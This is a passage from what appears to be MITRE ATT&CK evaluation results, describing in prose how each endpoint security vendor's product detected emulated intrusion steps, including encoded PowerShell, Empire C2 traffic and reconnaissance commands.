Telemetry from Nimda showed a TCP port 3389 connection from 10.0.1.6 (Nimda) to 10.0.0.5 (Conficker). The rundll32.exe process (PID 184) that was used to load updater.dll was used to proxy the RDP connection to Conficker. The telemetry was tainted by the activity generated during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Specific Behavior
A Specific Behavior Alert was generated indicating that powershell.exe was a suspicious child process of wscript.exe. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry of a process tree showed powershell.exe execution, including full command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated indicating that powershell.exe was executed with encoded command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched wscript.exe and powershell.exe with the correct ATT&CK Techniques (T1063 - Scripting, T1086 - Powershell). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits." [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe execution, including decoded full command-line arguments, as well as wscript.exe executing autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe, labeled with Command and Control as well as Malicious use of PowerShell. The alert was tagged as an Obfuscated PowerShell payload and mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell). [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed the process events associated with wscript.exe executing the autoupdate.vbs script (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated for "Windows Script Executing PowerShell" due to wscript.exe launching powershell.exe. The alert was mapped to the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated indicating that powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
FireEye
Specific Behavior
A Specific Behavior alert was generated for Suspicious PowerShell Usage (Methodology) indicating powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution) and captured the encoded command. [1] [2] [3] [4] [5] [6] [7]
Indicator of Compromise
An Indicator of Compromise alert was generated for EMPIRE RAT (Backdoor) based on a detected string specific to the backdoor. The alert was also mapped to a related ATT&CK Technique (T1086 - PowerShell). [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was tagged with the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched wscript.exe executing powershell.exe with a tag indicating that wscript executed code. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell executing a long, encoded command. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs and subsequently powershell.exe. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed wscript.exe executing autoupdate.vbs and that wscript.exe created a powershell.exe process, including the encoded command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Execution) and Techniques (PowerShell) and a suspicious indicator that a PowerShell command was executed. [1] [2] [3] [4] [5]
Enrichment
The capability enriched wscript.exe with the correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell) and a suspicious indicator that the VBScript interpreter was executed. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution with a very long command line. The alert was tagged with correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell). [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the VBScript interpreter launching a suspicious PowerShell process. The alert was tagged with the correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed wscript.exe (executing autoupdate.vbs) then spawning powershell.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for decoding and running encoded scripting sources from another process (wscript.exe). The alert was tagged with the correct ATT&CK Tactics (Defense Evasion, Execution) and Technique (PowerShell). [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell commands being executed from another process (wscript.exe). The alert was tagged with the correct ATT&CK Tactic (Execution) and Technique (PowerShell). [1] [2] [3] [4] [5]
Microsoft
Specific Behavior
A delayed Specific Behavior alert was generated for suspicious PowerShell command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior
A Specific Behavior alert was generated for PowerShell script with malicious cmdlets related to Empire. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior (Delayed)
A Specific Behavior alert was generated for PowerShell script with suspicious content detected through Antimalware Scan Interface extracted content. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry
Telemetry showed explorer.exe running autoupdate.vbs through wscript.exe and subsequent execution of PowerShell script and cmdlets. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed wscript.exe executing autoupdate.vbs as well as the resulting powershell.exe execution. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying PowerShell Empire. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Indicator of Compromise
Indicator of Compromise alerts were generated for suspicious PowerShell strings. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for suspicious PowerShell activity. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution. The alert was tagged with a related Technique (PowerShell). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for the execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
RSA
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs and the subsequent PowerShell child process. Vendor says truncation of the launch command-line arguments prevented the encoded PowerShell command from being decoded. [1] [2] [3]
SentinelOne
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs which then executed powershell.exe with an encoded PowerShell script. [1] [2] [3] [4]
General Behavior
A General Behavior alert was generated for the execution of autoupdate.vbs that was listed as an active threat. [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched backgroundtaskhost.exe and powershell.exe with the correct ATT&CK Technique (T1043 - Commonly Used Port). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed network connections, including over TCP port 443 to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe making connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe making an outgoing connection on TCP port 443 to 192.168.0.5 (C2 Server). Telemetry also showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain) over port 443. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched powershell.exe as making a connection over an "HTTP Port". The data was tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) and was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection over port 443 to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert for "PowerShell Making Network Connections" was triggered due to powershell.exe making a connection over port 443. The alert was tainted by a parent alert and mapped to the correct ATT&CK Tactic (Command and Control). [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry (Tainted)
Telemetry showed powershell.exe communicating over TCP port 443. The telemetry was tainted by the parent PowerShell Network Connection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor communicated with 192.168.0.5 (C2 server) over port 443. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed a network connection over port 443 to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3]
GoSecure
Telemetry
Telemetry showed powershell.exe creating an outbound connection to 192.168.0.5 (C2 server) over TCP port 443. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) and a suspicious indicator that powershell.exe accessed a known TCP port. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell sending and receiving information through port 443. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over port 443 (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert also showed decoded command-line arguments containing port 443. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
Enrichment (Tainted)
The capability enriched the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port). The data was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Tainted)
General Behavior alerts were generated for PowerShell making network connections to the internet as well as Wscript connecting to an external network. The alerts were tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over port 443 and to letsencrypt.org (no protocol was identified for this traffic). [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed network connections to 192.168.0.5 (C2 server) over TCP port 443. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed modload events importing dynamic libraries usually used for HTTP and SSL communication (e.g. winhttp.dll), followed by a CRL check to a CA, indicating that HTTPS was likely used. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. Telemetry also showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection over HTTPS to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). Telemetry also showed a connection to letsencrypt.org, which could indicate use of a cert for HTTPS. [1] [2] [3] [4] [5]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed powershell.exe making a connection over port 443 to freegoogleadsenseinfo.com (C2 domain). There was an alert for PowerShell downloading a significant amount of data using HTTP(S), though this alert was based only on the port (443). [1] [2] [3] [4] [5]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over TCP port 443 (no protocol was identified for this traffic). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic) and an alert that indicated that powershell.exe queried registered cryptographic provider libraries. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform an HTTPS connection to the C2 domain. [1] [2] [3] [4] [5]
Indicator of Compromise (Configuration Change)
An Indicator of Compromise alert was generated on the C2 domain. Vendor added detection for evaluation C2 domain using the standard customer-facing custom detection capabilities of the product. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2]
RSA
Telemetry
Telemetry showed powershell.exe making a connection over port 443 to freegoogleadsenseinfo.com (C2 domain). [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over TCP port 443 (no protocol was identified for this traffic). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1] [2]
Carbon Black
Telemetry
Telemetry showed modload events importing dynamic libraries usually used for HTTP and SSL communication (e.g. winhttp.dll), followed by a CRL check to a CA, indicating that HTTPS was likely used. [1]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1]
Cybereason
Telemetry (Tainted)
Telemetry showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. Telemetry also showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection over HTTPS to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). Telemetry also showed a connection to letsencrypt.org, which could indicate use of a cert for HTTPS. [1] [2]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for PowerShell downloading a significant amount of data using HTTP(S). [1]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over TCP port 443 (no protocol was identified for this traffic). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic) and an alert that indicated that powershell.exe queried registered cryptographic provider libraries. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform an HTTPS connection to the C2 domain. [1] [2]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over port 443 and to letsencrypt.org (no protocol was identified for this traffic). [1]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over TCP port 443 (no protocol was identified for this traffic). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing route.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed route.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Enrichment
The capability enriched route.exe with an alert for Route Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified route.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (route) has been tagged for monitoring because its parent process has a detection (powershell.exe).
Enrichment
The capability enriched route.exe indicating that it could be used to print the routing table as part of reconnaissance.
Telemetry
Telemetry showed powershell.exe executing route.exe with command-line arguments.
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing route.exe with command-line arguments and enriched the command with the conditions Reconnaissance Tool and Route Spawned with Reconnaissance. The enrichment was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
Enrichment
The capability enriched route.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that routing tables were viewed or manipulated.
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe. The telemetry was tainted by a trace detection on wscript.exe.
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
RSA
Telemetry
Telemetry showed powershell.exe executing route.exe with command-line arguments.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Technique (T1049 - System Network Configuration Discovery).
Telemetry
Telemetry within the process tree showed powershell.exe executing ipconfig.exe with command-line arguments.
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Cybereason
Enrichment (Tainted)
The capability enriched ipconfig.exe executing with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
Telemetry showed ipconfig.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments (tainted by parent PowerShell alerts).
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified ipconfig.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (ipconfig) has been tagged for monitoring because its parent process has a detection (powershell.exe).
Telemetry
Telemetry showed ipconfig.exe with command-line arguments.
Enrichment
The capability identified powershell.exe executing ipconfig.exe with a tag identifying the command as enumeration.
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing ipconfig.exe with command-line arguments and enriched the command with the condition Ipconfig All Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details.
McAfee
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery).
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe. The telemetry was tainted by a trace detection on wscript.exe.
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
RSA
Telemetry
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
Enrichment
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery).
Telemetry
Telemetry within the process tree showed powershell.exe executing whoami.exe with command-line arguments.
CrowdStrike
Telemetry
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Cybereason
Telemetry
Telemetry showed whoami.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment (Tainted)
The capability enriched whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The data was tainted by a parent PowerShell alert.
Endgame
Enrichment (Delayed, Tainted)
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections.
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections.
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified whoami.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery).
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (whoami) has been tagged for monitoring because its parent process has a detection (powershell.exe).
Enrichment
The capability enriched powershell.exe executing whoami.exe indicating a sign of reconnaissance before privilege escalation.
Telemetry
Telemetry showed powershell.exe executing whoami.exe with command-line arguments.
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing whoami.exe with command-line arguments and enriched the command with the condition Whoami Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details.
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe. The telemetry was tainted by a trace detection on wscript.exe.
Enrichment
The capability enriched whoami.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Owner / User Discovery) and a suspicious indicator that the name of the logged-on user was discovered.
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
RSA
Telemetry
Telemetry showed powershell.exe executing whoami.exe with command-line arguments.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Technique (Process Discovery).
Telemetry
Telemetry within the process tree showed powershell.exe executing qprocess.exe with command-line arguments.
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Cybereason
Enrichment (Tainted)
The capability enriched qprocess.exe executing as Reconnaissance and Local process discovery as well as the correct ATT&CK Technique (Process Discovery) and Tactic (Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
Telemetry showed qprocess.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments (tainted by parent PowerShell alerts).
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified qprocess.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment
The capability enriched qprocess.exe with an alert for Qprocess Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery).
F-Secure
Telemetry
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments.
General Behavior
A General Behavior alert was generated showing that a spawned process (qprocess) has been tagged for monitoring because its parent process has a detection (powershell.exe).
Enrichment
The capability enriched qprocess.exe as listing running processes and possibly a sign of reconnaissance.
GoSecure
Telemetry (Tainted)
